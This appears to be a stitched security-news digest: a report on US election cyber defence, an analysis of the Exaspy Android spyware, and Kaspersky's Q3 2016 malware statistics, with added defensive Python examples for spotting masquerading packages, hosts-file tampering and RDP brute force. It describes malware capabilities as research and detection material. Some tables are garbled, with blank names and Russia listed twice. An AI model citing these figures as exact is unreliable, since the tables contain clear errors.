NBC News confirmed the US Government is establishing a dedicated response team to prevent and repel any attack on the presidential election. Experts say it is an unprecedented effort; the US cyber army is ready to use its cyber weapons against any adversary that tries to interfere with the election.

“U.S. military officials often say in general terms that the U.S. possesses the world’s most advanced cyber capabilities, but they will not discuss details of highly classified cyber weapons.” wrote the NBC News.

“James Lewis, a cyber expert at the Center for Strategic and International Studies, says that U.S. hacks into the computer infrastructure of adversary nations such as China, Russia, Iran and North Korea — something he says he presumes has gone on for years — is akin to the kind of military scouting that is as old as human conflict.”

“This is just the cyber version of that,” he said.

In 2014, the NSA director Adm. Mike Rogers told Congress that U.S. adversaries are performing electronic “reconnaissance” on a regular basis.

“All of that leads me to believe it is only a matter of when, not if, we are going to see something dramatic,” he said at the time.


On the other hand, the NSA regularly penetrates foreign networks to gather intelligence.

“You’d gain access to a network, you’d establish your presence on the network and then you’re poised to do what you would like to do with the network,” Gary Brown, a retired colonel and former legal adviser to U.S. Cyber Command, told NBC News. “Most of the time you might use that to collect information, but that same access could be used for more aggressive activities too.”

The senior US intelligence official confirmed that the U.S. could take action to shut down some Russian systems in the event of Russian cyber attacks. He was referring to a practice that security experts call active defense, or hack back.

“I think there’s three things we should do if we see a significant cyber-attack,” he said. “The first obviously is defending against it. The second is reveal: We should be publicizing what has happened so that any of this kind of cyber trickery can be unmasked. And thirdly, we should respond. Our response should be proportional.” Retired Adm. James Stavridis told NBC News.

Brown highlighted the lack of an exhaustive and shared doctrine around cyber warfare.

“Cyber war is undefined,” Brown added. “There are norms of behavior that we try to encourage, but people violate those.”

Commercial Exaspy spyware used to target high-level executives
6.11.2016 securityaffairs Android
Security researchers at Skycure have discovered a new commodity Android Spyware, dubbed Exaspy, targeting high-level executives.
While in many countries smartphones and tablets now outnumber desktop PCs, new threats are targeting mobile devices.

Researchers at Skycure have discovered a new strain of Android spyware, dubbed Exaspy, that has been used in targeted attacks against high-level executives.

Researchers from Skycure discovered an instance of the Exaspy malware that was installed on an Android 6.0.1 device owned by a Vice President at an unnamed company.

One of the most interesting aspects of this Android malware is that it requires manual installation on the target device, which implies that the attackers need physical access to the smartphone.

Below is the analysis provided by Skycure; it is interesting to note that the Exaspy malware needs admin rights and a licence number in order to run.

“Interestingly, this malware actually requires an end user to perform the initial installation steps, meaning physical access to the device is required at installation time. Here is how the app installs itself when it runs for the first time:

Malware requests access to device admin rights
Asks (nicely) for a licence number
Hides itself
Requests access to root (if the device is rooted and managed through popular rooting apps). Once granted, it installs itself as a system package to make its uninstallation process harder.”

Once the malware is installed on the device, it is able to access the victim’s chats and messages (SMS, MMS, Facebook Messenger, Google Hangouts, Skype, Gmail, native email client, Viber, WhatsApp, etc.).

On the infected device, the app runs under the name Google Services, using the package name “,” which allows it to masquerade as the legitimate Google Play Services.
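Skycure notes that Exaspy hides under the name Google Services with a package name resembling the legitimate Google Play Services and, on rooted devices, installs itself as a system package. The following is an added example of checking a device inventory for that kind of imitation; it is not Skycure’s code and does not use the real Exaspy package name (which this page does not reproduce). It assumes input in the format of `adb shell pm list packages -f` plus a map of display labels such as an MDM export would provide; the inventory, the labels and the lookalike package names are constructed placeholders.

```python
"""Flag Android packages whose name or label imitates Google Play services.

Added example, not from Skycure's analysis. The inventory lines follow the
`pm list packages -f` format (package:<apk path>=<package name>); the
lookalike package names and the label map are constructed placeholders.
"""
from difflib import SequenceMatcher

LEGIT_GMS = "com.google.android.gms"  # genuine Google Play services package
MASQUERADE_LABELS = ("google services", "google play services")

# Constructed inventory; only the first line names a real package.
SAMPLE_INVENTORY = """\
package:/system/priv-app/GmsCore/GmsCore.apk=com.google.android.gms
package:/data/app/com.example.notes-1/base.apk=com.example.notes
package:/system/priv-app/svc/base.apk=com.google.android.gsm
package:/data/app/org.example.sync-2/base.apk=org.example.sync
"""

# Constructed display labels, as a device inventory export would list them.
SAMPLE_LABELS = {
    "com.google.android.gms": "Google Play services",
    "com.example.notes": "Notes",
    "com.google.android.gsm": "Google Services",
    "org.example.sync": "Google Play services",
}


def parse_inventory(text):
    """Map package name -> APK path from `pm list packages -f` output."""
    pkgs = {}
    for line in text.splitlines():
        if line.startswith("package:"):
            path, _, name = line[len("package:"):].rpartition("=")
            pkgs[name] = path
    return pkgs


def suspicious_packages(pkgs, labels, threshold=0.85):
    """Return {package: [reasons]} for packages that imitate Play services.

    Two signals: a package name close to the genuine one (typo-squatting),
    and a display label that claims to be Google (Play) services while the
    package is not the genuine one. A hit living under /system/ is noted
    because that is where the spyware installs itself to resist removal.
    """
    hits = {}
    for name, path in pkgs.items():
        if name == LEGIT_GMS:
            continue
        reasons = []
        sim = SequenceMatcher(None, name, LEGIT_GMS).ratio()
        if sim >= threshold:
            reasons.append(f"name resembles {LEGIT_GMS} (similarity {sim:.2f})")
        if labels.get(name, "").lower() in MASQUERADE_LABELS:
            reasons.append(f"label {labels[name]!r} imitates Play services")
        if reasons and path.startswith("/system/"):
            reasons.append("installed as a system package (harder to uninstall)")
        if reasons:
            hits[name] = reasons
    return hits


if __name__ == "__main__":
    inventory = parse_inventory(SAMPLE_INVENTORY)
    for pkg, reasons in suspicious_packages(inventory, SAMPLE_LABELS).items():
        print(pkg)
        for reason in reasons:
            print("   -", reason)
```

The similarity threshold is a tuning knob: 0.85 catches a transposed or swapped label in the last component while leaving unrelated `com.google.android.*` packages alone, but a fleet baseline of known-good package names is the more reliable check when one is available.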

The Exaspy malware is able to record surrounding audio and the victim’s calls; it can access photos on the device, take screenshots, and access much other user data, including the browser history and call logs.

The malware tries to transfer the stolen data to its C&C server whenever connectivity is available and waits for commands.

“The CNC (command and control) server is able to perform requests of its own, which include:

Monitor and transmit local files, such as photos and videos taken.
Execute shell commands, or spawn a reverse shell, which allows the app to elevate its privileges using exploits that are not included in the basic package.”

The spyware communicates with a server at hxxps:// hosted in Google Cloud; it can download updates from the hard-coded URL hxxp://

Mobile malware is a preferred tool for attackers targeting high-profile individuals; recently, experts discovered another commercial spyware, called Pegasus, developed by the Israeli firm NSO Group.

I should also mention that the Exaspy spyware is being sold online as a $15-a-month turnkey service.

What is the next commercial spyware?

IT threat evolution Q3 2016. Statistics
5.11.2016 Kaspersky Analysis

All the statistics used in this report were obtained using Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity.

Q3 figures

According to KSN data, Kaspersky Lab solutions detected and repelled 171,802,109 malicious attacks from online resources located in 190 countries all over the world.
45,169,524 unique URLs were recognized as malicious by web antivirus components.
Kaspersky Lab’s web antivirus detected 12,657,673 unique malicious objects: scripts, exploits, executable files, etc.
Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 1,198,264 user computers.
Crypto ransomware attacks were blocked on 821,865 computers of unique users.
Kaspersky Lab’s file antivirus detected a total of 116,469,744 unique malicious and potentially unwanted objects.
Kaspersky Lab mobile security products detected:
1,520,931 malicious installation packages;
30,167 mobile banker Trojans (installation packages);
37,150 mobile ransomware Trojans (installation packages).
Mobile threats

Q3 events

Pokémon GO: popular with users and hackers

One of the most significant events of the third quarter was the release of Pokémon GO. Of course, cybercriminals could not ignore such a popular new product and tried to exploit the game for their own purposes. This was primarily done by adding malicious code to the original app and spreading malicious versions via third-party stores. This method was used, for example, to spread Trojan-Banker.AndroidOS.Tordow, which exploits vulnerabilities in the system to obtain root access to a device. With root access, this Trojan protects itself from being deleted, and it can also steal saved passwords from browsers.

But perhaps the most notable case of Pokémon GO’s popularity being used to infect mobile devices involved fraudsters publishing a guide for the game in the official Google Play store. The app turned out to be an advertising Trojan capable of gaining root access to a device by exploiting vulnerabilities in the system.

We later came across two more modifications of this Trojan, which were added to Google Play under the guise of different apps. According to Google Play data, one of them, imitating an equalizer, was installed between 100,000 and 500,000 times.

Interestingly, one of the methods used by the cybercriminals to promote the Trojan was a service that pays users to install advertising apps.


Screenshot of the app that prompts the user to install the Trojan for 5 cents

According to this company’s rules, it doesn’t work with users whose devices have root access. The users may be looking to earn some money, but they end up with an infected device and don’t actually receive any money, because after infection the device gains root access.

Ad with a Trojan

The most popular mobile Trojan in the third quarter of 2016 was Trojan-Banker.AndroidOS.Svpeng.q. During the quarter, the number of users attacked by it grew almost eightfold.

Over 97% of users attacked by Svpeng were located in Russia. The attackers managed to make the Trojan so popular by advertising it via Google AdSense – one of the most popular advertising networks on the Russian Internet. Many popular sites use it to display targeted advertising. Anyone can pay to register their ad on the network, and that was exactly what the attackers did.

Along with the advert, however, they added the AdSense Trojan. When a user visited the page with the advert, Svpeng was downloaded to their device.

Bypassing protection mechanisms in Android 6

In our report for the second quarter of 2016 we mentioned the Trojan-Banker.AndroidOS.Asacub family that can bypass several system controls. Of special note this quarter is the Trojan-Banker.AndroidOS.Gugi family that has learned to bypass the security mechanisms introduced in Android 6 by tricking the user. The Trojan first requests rights to overlay other applications, and then uses those rights to trick the user into giving it privileges to work with text messages and to make calls.

Trojan ransomware in the Google Play store

In the third quarter, we registered the propagation of Trojan-Ransom.AndroidOS.Pletor.d, a mobile ransomware program, via Google Play. The Trojan imitated an app for servicing devices, including deleting unnecessary data, speeding up device performance and even antivirus protection.


Trojan-Ransom.AndroidOS.Pletor.d in Google Play

The Trojan checks which country the device is located in, and if it is not Russia or Ukraine, it requests administrator rights and calls the command server. Earlier versions of this Trojan encrypted user data, but this modification doesn’t possess such functionality. Instead, the Trojan blocks operation of the device by opening a window that covers all other open windows and demands a ransom to unblock it.

Mobile threat statistics

In Q3 2016, Kaspersky Lab detected 1,520,931 malicious installation packages, which is 2.3 times fewer than in the previous quarter.


Number of detected malicious installation packages (Q4 2015 – Q1 2016)

Distribution of mobile malware by type


Distribution of new mobile malware by type (Q2 2016 and Q3 2016)

In Q3 2016, RiskTool software, or legitimate applications that are potentially dangerous to users, topped the rating of malicious objects detected for mobile devices. Their share continued to grow from 45.1% in Q2 to 55.8% this quarter.

Due to the large number of RiskTool programs and the considerable increase in their overall share of the total flow of detected objects, the proportion of almost all other types of malicious programs decreased, even where the actual number of detected programs increased compared to the previous quarter.

The most affected was Trojan-Ransom – its share decreased from 5.72% to 2.37%. This was caused by a decline in activity by the Trojan-Ransom.AndroidOS.Fusob family (covered in more detail below).

At the same time, we registered a slight growth in the share of Trojan-Bankers – from 1.88% to 1.98%.

TOP 20 mobile malware programs

Please note that this rating of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware.

Rank  Name                                    % of attacked users*
1     DangerousObject.Multi.Generic           78.46
2     Trojan-Banker.AndroidOS.Svpeng.q        11.45
3     Trojan.AndroidOS.Ztorg.t                 8.03
4     Backdoor.AndroidOS.Ztorg.c               7.24
5     Backdoor.AndroidOS.Ztorg.a               6.55
6                                              4.91
7     Trojan.AndroidOS.Hiddad.v                4.55
8                                              4.25
9                                              3.67
10    Trojan.AndroidOS.Ztorg.aa                3.61
11    Trojan-Banker.AndroidOS.Svpeng.r         3.44
12    Trojan.AndroidOS.Ztorg.pac               3.31
13    Trojan.AndroidOS.Iop.c                   3.27
14    Trojan.AndroidOS.Muetan.b                3.17
15    Trojan.AndroidOS.Vdloader.a              3.14
16    Trojan-Dropper.AndroidOS.Triada.s        2.80
17    Trojan.AndroidOS.Muetan.a                2.77
18    Trojan.AndroidOS.Triada.pac              2.75
19    Trojan-Dropper.AndroidOS.Triada.d        2.73
20    Trojan.AndroidOS.Agent.eb                2.63
* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab’s mobile security product that were attacked.

First place is occupied by DangerousObject.Multi.Generic (78.46%), the verdict used for malicious programs detected using cloud technologies. Cloud technologies work when the antivirus database contains neither the signatures nor heuristics to detect a malicious program, but the cloud of the antivirus company already contains information about the object. This is basically how the very latest malware is detected.

In Q3 2016, 17 Trojans that use advertising as their main means of monetization (highlighted in blue in the original table) made it into the TOP 20. Their goal is to deliver as many adverts as possible to the user, employing various methods, including the installation of new adware. These Trojans may use superuser privileges to conceal themselves in the system application folder, from which they are very difficult to delete.


With root access on the device, Trojans can do many different things without the user being aware, such as installing apps from Google Play, including paid apps.

It’s worth noting that the Trojans from the Ztorg family, which occupied four places in the TOP 20, are often distributed via the official Google Play store. Since the end of 2015, we have registered more than 10 such cases (including a fake guide for Pokémon GO). Several times the Trojan notched up over 100,000 installations, and on one occasion it was installed more than 500,000 times.

The ranking also included two representatives of the Trojan-Banker.AndroidOS.Svpeng mobile banker family. As we mentioned above, Svpeng.q became the most popular malware in the third quarter of 2016. This was down to the Trojan being distributed via the AdSense advertising network, which is used by a large number of sites on the Russian segment of the Internet.

The geography of mobile threats


The geography of attempted mobile malware infections in Q3 2016 (percentage of all users attacked)

TOP 10 countries attacked by mobile malware (ranked by percentage of users attacked)

Rank  Country*          % of users attacked**
1     Bangladesh        35.57
2     Nepal             31.54
3     Iran              31.38
4     China             26.95
5     Pakistan          26.83
6     Indonesia         26.33
7     India             24.35
8     Nigeria           22.88
9     Algeria           21.82
10    The Philippines   21.67
* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country.

Bangladesh topped the rating, with almost 36% of users there encountering a mobile threat at least once during the quarter. China, which came first in this rating two quarters in a row, dropped to fourth place.

The most popular mobile malware in all the countries of this rating (except China) was the same – advertising Trojans that mostly belonged to the Ztorg, Iop, Hiddad and Triada families. A significant proportion of attacks in China also involved advertising Trojans, but the majority of users there encountered Trojans from the Backdoor.AndroidOS.GinMaster and Backdoor.AndroidOS.Fakengry families.

Russia (12.1%) came 24th in this rating, France (6.7%) 52nd, the US (5.3%) 63rd, Italy (5.1%) 65th, Germany (4.9%) 68th, and the United Kingdom (4.7%) 71st.

The situation in Germany and Italy has improved significantly: in the previous quarter, 8.5% and 6.2% of users in those countries respectively were attacked. This was due to a decline in activity by the Fusob family of mobile ransomware.

The safest countries were Austria (3.3%), Croatia (3.1%) and Japan (1.7%).

Mobile banking Trojans

Over the reporting period, we detected 30,167 installation packages for mobile banking Trojans, which is 1.1 times as many as in Q2.


Number of installation packages for mobile banking Trojans detected by Kaspersky Lab solutions
(Q4 2015 – Q3 2016)

Trojan-Banker.AndroidOS.Svpeng became the most popular mobile banking Trojan in Q3 due to its active distribution via the advertising network AdSense. More than half the users that encountered mobile banking Trojans in the third quarter faced Trojan-Banker.AndroidOS.Svpeng.q. It was constantly increasing the rate at which it spread – in September the number of users attacked by the Trojan was almost eight times greater than in June.


The number of unique users attacked by the Trojan-Banker.AndroidOS.Svpeng banking Trojan family
(June-September 2016)

Over 97% of attacked users were in Russia. This family of mobile banking Trojans uses phishing windows to steal credit card data and logins and passwords from online banking accounts. In addition, fraudsters steal money via SMS services, including mobile banking.


Geography of mobile banking threats in Q3 2016 (percentage of all users attacked)

TOP 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)

Rank  Country*      % of users attacked**
1     Russia        3.12
2     Australia     1.42
3     Ukraine       0.95
4     Uzbekistan    0.60
5     Tajikistan    0.56
6     Kazakhstan    0.51
7     China         0.49
8     Latvia        0.47
9     Russia        0.41
10    Belarus       0.37
* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country.

In Q3 2016, first place was occupied by Russia (3.12%) where the proportion of users that encountered mobile banker Trojans almost doubled from the previous quarter.

In second place again was Australia (1.42%), where the Trojan-Banker.AndroidOS.Acecard and Trojan-Banker.AndroidOS.Marcher families were the most popular threats.

The most widely distributed mobile banking Trojans in Q3 were representatives of the Svpeng, Faketoken, Regon, Asacub, Gugi and Grapereh families. In particular, the third quarter saw the Trojan-Banker.AndroidOS.Gugi family learn how to bypass protection mechanisms in Android by tricking users.

Mobile Ransomware

In Q3 2016, we detected 37,150 mobile Trojan-Ransomware installation packages.


Number of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab
(Q4 2015 – Q3 2016)

The sharp rise in the number of mobile Trojan-Ransomware installation packages in Q1 and Q2 of 2016 was caused by the active proliferation of the Trojan-Ransom.AndroidOS.Fusob family of Trojans. In the first quarter of 2016, this family accounted for 96% of users attacked by mobile ransomware; in Q2 it accounted for 85%. Its share in Q3 was 73%.


Number of users attacked by the Trojan-Ransom.AndroidOS.Fusob family, January-September 2016

The highest number of users attacked by this mobile Trojan-Ransomware family was registered in March 2016. Since then the number of attacked users has been decreasing, especially in Germany.

Despite this, Trojan-Ransom.AndroidOS.Fusob.h remained the most popular mobile Trojan-Ransomware in the third quarter, accounting for nearly 53% of users attacked by mobile ransomware. Once run, the Trojan requests administrator privileges, collects information about the device, including GPS coordinates and call history, and downloads the data to a malicious server. After that, it may receive a command to block the device.


Geography of mobile Trojan-Ransomware in Q3 2016 (percentage of all users attacked)

TOP 10 countries attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked)

Rank  Country*      % of users attacked**
1     Canada        0.95
2     USA           0.94
3     Kazakhstan    0.71
4     Germany       0.63
5     UK            0.61
6     Mexico        0.58
7     Australia     0.57
8     Spain         0.54
9     Italy         0.53
10    Switzerland   0.51
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab’s mobile security product in the country.

In all the TOP 10 countries apart from Kazakhstan, the most popular Trojan-Ransom family was Fusob. In the US, the Trojan-Ransom.AndroidOS.Svpeng family was also popular. This Trojan family emerged in 2014 as a modification of the Trojan-Banker.AndroidOS.Svpeng family. These Trojans demand a ransom of $100-$500 from victims to unblock their devices.


In Kazakhstan, the main threat to users originated from representatives of the Small mobile Trojan-Ransom family. This is a fairly simple ransomware program that blocks the operation of a device by overlaying all the windows with its own and demanding $10 to remove it.

Vulnerable apps exploited by cybercriminals

In Q3 2016, the Neutrino exploit kit departed the cybercriminal market, following in the wake of Angler and Nuclear which also left the market in the previous quarter.

RIG and Magnitude remain active. RIG was especially prominent – it has quickly filled the vacant niche on the exploit kit market.

This is the overall picture for the use of exploits this quarter:


Distribution of exploits used in attacks by the type of application attacked, Q3 2016

Exploits for different browsers and their components (45%) once again topped the rating, although their share decreased by 3 percentage points. They are followed by exploits for Android OS vulnerabilities (19%), whose share fell 5 p.p. in the third quarter. Exploits for Microsoft Office rounded off the top three; their contribution actually increased from 14% to 16% in Q3.

Exploits for Adobe Flash Player remained popular. In fact, their share more than doubled from 6% to 13%. This was caused by the aforementioned RIG exploit kit: its use in several campaigns saw the share of SWF exploits increase dramatically.

Online threats (Web-based attacks)

The statistics in this section were derived from web antivirus components that protect users from attempts to download malicious objects from a malicious/infected website. Malicious websites are created deliberately by malicious users; infected sites include those with user-contributed content (such as forums), as well as compromised legitimate resources.

In the third quarter of 2016, Kaspersky Lab’s web antivirus detected 12,657,673 unique malicious objects (scripts, exploits, executable files, etc.) and 45,169,524 unique URLs were recognized as malicious by web antivirus components. Kaspersky Lab solutions detected and repelled 171,802,109 malicious attacks from online resources located in 190 countries all over the world.

Online threats in the banking sector

These statistics are based on detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.

Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on 1,198,264 computers in Q3 2016. The number of users attacked by financial malware increased by 5.8% from the previous quarter (1,132,031).

The third quarter is traditionally the holiday season for many users of online banking services in Europe, which means the number of online payments made by these users increases during this period. This inevitably brings an increase in financial risk.


Number of users attacked by financial malware, Q3 2016

In Q3, the activity of financial threats grew month on month.

Geography of attacks

To evaluate and compare the risk of being infected by banking Trojans worldwide, we calculate the percentage of Kaspersky Lab product users in the country who encountered this type of threat during the reporting period, relative to all users of our products in that country.


Geography of banking malware attacks in Q3 2016 (percentage of attacked users)

TOP 10 countries by percentage of attacked users

Rank  Country*      % of attacked users**
1     Russia        4.20
2     Sri Lanka     3.48
3     Brazil        2.86
4     Turkey        2.77
5     Cambodia      2.59
6     Ukraine       1.90
7     Venezuela     1.90
8     Vietnam       1.86
9     Argentina     1.86
10    Uzbekistan    1.77
These statistics are based on detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.
* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (under 10,000).
** Unique users whose computers have been targeted by banking Trojan attacks as a percentage of all unique users of Kaspersky Lab products in the country.

In the third quarter of 2016, Russia had the highest proportion of users attacked by banking Trojans. Representatives of the Trojan-Banker ZeuS (Zbot) family, which leads the way in terms of the number of attacked users worldwide, were especially active in Russia. This is unsurprising since Russian cybercriminals are allegedly behind the development of this malware. They know the specifics of Russia’s online banking systems as well as the mentality of Russian users and take them into consideration when developing their malware. In Russia, the Gozi banking Trojan continues to proliferate. It displayed a burst of activity in the previous quarter after its developers joined forces with the creators of the Nymaim Trojan. Russia also topped the TOP 10 countries with the highest proportion of users attacked by mobile bankers.

Sri Lanka, a favorite destination with tourists, was a newcomer to the rating, going straight in at second. Financial threats were encountered by 3.48% of users in the country. Among them are likely to be foreigners who arrived in the country on holiday and used online banking services to make payments. The most active representatives of banking malware in the region were those from the Fsysna banker family. This family has previously been noted for attacks targeting customers of Latin American banks.


Brazil rounds off the top three for the second quarter in a row. In Q2, we forecast a surge of financial threat activity in Latin America and specifically in Brazil because of this summer’s Olympic Games. However, the increase in the proportion of users attacked in Brazil was negligible: in the third quarter, 2.86% of users in Brazil encountered financial threats compared to 2.63% in Q2. At the same time, users in Argentina were subjected to a surge in malicious attacks, and as a result, the country ranked ninth.

The holiday season affected almost all countries in the TOP 10. In Russia, Ukraine and Uzbekistan, people traditionally have vacations at this time of the year, while other countries (Sri Lanka, Brazil, Turkey, Cambodia, etc.) are considered popular tourist destinations. Tourists tend to be active users of online banking systems, which in turn attracts cybercriminals and their banking malware.

The share of banking Trojan victims in Italy was 0.60%, in Spain it was 0.61%, while in Germany and the UAE the figures were 1.21% and 1.14% respectively.

The TOP 10 banking malware families

The table below shows the TOP 10 malware families used in Q3 2016 to attack online banking users (as a percentage of users attacked):

Name* % of attacked users**
1 Trojan-Spy.Win32.Zbot 34.58
2 Trojan.Win32.Qhost/Trojan.BAT.Qhost 9.48
3 Trojan.Win32.Fsysna 9.467
4 Trojan-Banker.Win32.Gozi 8.98
5 Trojan.Win32.Nymaim 8.32
6 Trojan-Banker.Win32.Shiotob 5.29
7 Trojan-Banker.Win32.ChePro 3.77
8 Trojan-Banker.Win32.BestaFera 3.31
9 Trojan-Banker.Win32.Banbra 2.79
10 Trojan.Win32.Neurevt 1.79
* The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware.

The undisputed leader of the rating is Trojan-Spy.Win32.Zbot. Its source code has been publicly available since it was leaked and is now widely used as an easy-to-use tool for stealing user payment data. Unsurprisingly, this malware consistently tops this rating – cybercriminals regularly enhance the family with new modifications compiled from the leaked source code that differ only slightly from the original.

The family of Qhost Trojans (verdicts Trojan.Win32.Qhost and Trojan.BAT.Qhost) came second. The functionality of this family's malicious programs is relatively simple: the Trojan modifies the content of the hosts file (a plain text file that maps domain names to the network addresses of hosts), and as soon as specific resources are visited, the Trojan's malicious components are loaded onto the infected workstation and used to steal payment information. The Trojan also adds a number of records to the hosts file that prevent the user's browser from connecting to the web-based apps and resources of popular antivirus vendors.
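The hosts-file tampering described above is easy to audit from the defender's side. The following is an added example, not code from the report: it parses a hosts file and flags watched security-vendor domains pinned to loopback or 0.0.0.0 (silently blocked) as well as any name pointed at an outside address (traffic redirected past DNS). The watch-list and the sample hosts file are constructed.

```python
import ipaddress
from typing import Dict, List

# Constructed watch-list of security-vendor and update domains; a hosts-file
# entry for any of these is suspicious. Real deployments load this from config.
WATCHED_SUFFIXES = ("kaspersky.com", "symantec.com", "microsoft.com",
                    "windowsupdate.com")

def parse_hosts(text: str) -> List[Dict[str, object]]:
    """Return one record per active hosts entry (line number, address,
    hostnames). Handles full-line and trailing '#' comments, blank lines,
    several hostnames on one line and IPv6; lines whose first token is not
    an IP address are skipped rather than raising."""
    records = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            addr = ipaddress.ip_address(parts[0])
        except ValueError:
            continue
        records.append({"line": no, "addr": addr,
                        "names": [h.lower() for h in parts[1:]]})
    return records

def is_watched(name: str) -> bool:
    return any(name == s or name.endswith("." + s) for s in WATCHED_SUFFIXES)

def audit_hosts(text: str) -> List[Dict[str, object]]:
    """Flag two patterns: a watched domain pinned to loopback/0.0.0.0
    (vendor sites and updates silently blocked, as Qhost does) and any
    name pointed at a real address (DNS bypassed, traffic redirected).
    Intranet entries (RFC 1918) would need an allow-list in practice."""
    findings = []
    for rec in parse_hosts(text):
        addr = rec["addr"]
        sinkhole = addr.is_loopback or addr.is_unspecified
        for name in rec["names"]:
            if sinkhole and is_watched(name):
                kind = "vendor_blocked"
            elif not sinkhole:
                kind = "redirected"
            else:
                continue  # e.g. '127.0.0.1 localhost' or a user's ad-block entry
            findings.append({"line": rec["line"], "host": name,
                             "ip": str(addr), "kind": kind})
    return findings

# Constructed sample hosts file: benign entries first, then Qhost-style ones.
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
127.0.0.1 ads.example.net          # user's own ad-block entry, not watched
127.0.0.1 www.kaspersky.com        # vendor site sinkholed to loopback
0.0.0.0   update.microsoft.com windowsupdate.microsoft.com  # two names
198.51.100.7 onlinebank.example.org  # bank domain pointed at an outside host
"""

if __name__ == "__main__":
    for f in audit_hosts(SAMPLE_HOSTS):
        print(f"line {f['line']}: {f['host']} -> {f['ip']} ({f['kind']})")
```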

The Q3 rating also includes a new malware representative that has already demonstrated its capabilities in Sri Lanka – the Trojan.Win32.Fsysna family of banking Trojans. Members of this family, in addition to stealing payment data from infected workstations, are also used by cybercriminals to distribute spam. The Trojan uses an infected machine to relay spam messages from the command center to a mail server. Some representatives of this family also possess Trojan cryptor functionality. Fsysna is something of a 'Swiss army knife' that cybercriminals use to steal money.

Q3 2016 saw a decline in the activity of the notorious financial threat Trojan-Spy.Win32.Lurk: the number of users attacked by this malware fell by 7.1%. Lurk was not included in the TOP 10 banking malware families, but it still poses a threat to users of online banking systems. The cybercriminal group behind this financial threat has been arrested (something we wrote about in a separate article), so we expect to see a further decrease in activity by this banking Trojan next quarter.

Ransomware Trojans

Cryptors are currently one of the biggest threats to users and companies. These malicious programs are becoming more and more popular in the cybercriminal world because they are capable of generating large profits for their owners.

A total of 21 new cryptor families and 32,091 new modifications were detected in Q3. We also added several existing cryptor families to our virus collection.

The number of new cryptor families added to our virus collection is slightly less than in the second quarter (25), but the number of newly created modifications increased 3.5 times compared to the previous quarter.


The number of newly created cryptor modifications, Q1 – Q3 2016

Malware writers are constantly trying to improve their creations. New ways to infect computers are always being sought, especially for attacks on companies, which cybercriminals see as far more profitable than attacks on standard users.

Remote launching of cryptors by cybercriminals

We are increasingly seeing incidents where cybercriminals crack passwords to gain remote access to a victim’s system (usually an organization) and infect a compromised machine with Trojan ransomware. Examples of this in Q3 were Dcryptor and Xpan.


Trojan-Ransom.Win32.Dcryptor is known on the Internet under the pseudonym 'Mamba'. Infection is carried out manually. The fraudsters brute-force the passwords for remote access to the victim machine and run the Trojan, passing the encryption password to it as a command-line argument.

During infection, the Trojan uses the legitimate DiskCryptor utility. As a result, it is not just individual files on network drives that are encrypted but entire sectors of the local hard drive. System boot is blocked: once the computer is started, a message appears on the screen demanding a ransom and displaying an email address for communicating with the attackers.

This Trojan reminds us of the notorious Petya/Mischa Trojan and continues the growing trend of cybercriminals looking for new ways to block access to data.

Xpan/TeamXRat ransomware

Trojan-Ransom.Win32.Xpan is yet another example of ransomware that is launched after attackers remotely penetrate a system. This Trojan is distributed by Brazilian cybercriminals. They brute-force the RDP password (RDP being the standard protocol for remote access to Windows computers) and infect the compromised system with the Xpan Trojan, which encrypts files and displays a ransom demand.
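Both Dcryptor and Xpan start with password guessing against a remote-access service, so the precursor is visible in the Windows Security log long before any encryption begins. The following is an added detection example, not code from the report: it correlates logon-failure events (4625) with a subsequent success (4624), restricted to logon type 10 (RemoteInteractive, i.e. RDP), per source address. The CSV log extract is constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, List

FAIL_THRESHOLD = 5             # this many failed RDP logons from one source...
WINDOW = timedelta(minutes=5)  # ...inside this window counts as brute force
RDP_LOGON_TYPE = 10            # RemoteInteractive in 4624/4625 event data

def parse_line(line: str) -> Dict[str, object]:
    """Parse one constructed CSV line: time,event_id,logon_type,user,src_ip
    (the fields a collector would pull from TargetUserName/LogonType/IpAddress)."""
    ts, event_id, logon_type, user, src = line.strip().split(",")
    return {"time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"),
            "event_id": int(event_id), "logon_type": int(logon_type),
            "user": user, "src": src}

def detect_rdp_bruteforce(lines: List[str]) -> List[Dict[str, object]]:
    """Return alerts in time order: 'bruteforce' once a source crosses the
    failure threshold, 'compromised' when that same source then logs in."""
    events = sorted((parse_line(l) for l in lines if l.strip()),
                    key=lambda e: e["time"])
    failures = defaultdict(deque)   # src_ip -> timestamps of recent 4625s
    flagged = set()                 # sources already reported as brute-forcing
    alerts = []
    for ev in events:
        if ev["logon_type"] != RDP_LOGON_TYPE:
            continue                # network/service logons are out of scope
        recent = failures[ev["src"]]
        while recent and ev["time"] - recent[0] > WINDOW:
            recent.popleft()        # slide the window forward
        if ev["event_id"] == 4625:
            recent.append(ev["time"])
            if len(recent) >= FAIL_THRESHOLD and ev["src"] not in flagged:
                flagged.add(ev["src"])
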